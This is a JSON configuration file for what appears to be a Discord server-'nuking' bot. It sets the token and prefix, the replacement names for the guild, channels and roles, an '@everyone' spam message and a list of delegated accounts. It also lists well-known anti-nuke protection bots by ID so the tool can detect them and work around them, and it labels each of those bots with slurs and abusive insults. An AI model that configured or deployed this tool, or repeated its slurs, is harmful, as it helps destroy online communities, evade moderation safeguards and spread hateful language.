{
    "client": {
        "options": {
            "owner_ids": [],
            "prefixes": ["n/", "n."],
            "token": ""
        }
    },

    "nuking": {
        "options": {
            "guild": {
                "name": "GUILD_NAME_GOES_HERE",
                "reason": "REASON_GOES_HERE"
            },

            "channel": {
                "name": "CHANNEL_NAME_GOES_HERE",
                "message": "@everyone"
            },

            "icons": {
                "guild": "./icons/guild_icon.png",
                "avatar": "./icons/bot_icon.png",
                "emoji": "./icons/emoji_icon.png",
                "sticker": "./icons/sticker_icon.png"
            },

            "role": {
                "name": "ROLE_NAME_GOES_HERE",
                "color": "#ffffff"
            },

            "backup_role": {
                "name": "ROLE_NAME_GOES_HERE",
                "color": "#000000"
            },

            "filtered": {
                "members": [],
                "guilds": []
            },

            "delegation": {
                "tokens": []
            },

            "accepted": false,

            // DO NOT MODIFY THIS CHUNK
            // THIS CHUNK IS FOR DETECTING ANTI-NUKE BOTS FOR VULNERABILITIES

            "protection_bots": [
                {
                    "aliases": ["bloated shitstain", "bot for pedophiles", "jorrell's favorite cumrag"],
                    "name": "Wick",
                    "id": 536991182035746816
                },
                {
                    "aliases": ["fucking useless semen hounder", "a correlation to abstract divinities", "bot for faggots"],
                    "name": "Security",
                    "id": 651095740390834176
                },
                {
                    "aliases": ["protect my nuts", "protecting scurvy", "faggot's choice"],
                    "name": "Protect",
                    "id": 614755681936867328
                },
                {
                    "aliases": ["vandalize anyway", "complete fucking degeneracy", "use this if you're a predator"],
                    "name": "Anti-Vandalism",
                    "id": 711328570374619207
                },
                {
                    "aliases": ["rem's first choice", "anybody who uses this bot is retarded", "non-existent brain stimuli"],
                    "name": "Evelina",
                    "id": 1242930981967757452
                },
                {
                    "aliases": ["owner is potentially a pedophile", "fibrosis user", "inhaling the scent of peni"],
                    "name": "Blaze",
                    "id": 1019082814420963371
                },
                {
                    "aliases": ["your mother's a cuntsack", "definitely retarded", "anti-pussy activist"],
                    "name": "Cloud Security",
                    "id": 1342380987035680778
                }
            ]

            // THIS CHUNK IS FOR DETECTING ANTI-NUKE BOTS FOR VULNERABILITIES
            // DO NOT MODIFY THIS CHUNK
        }
    }
}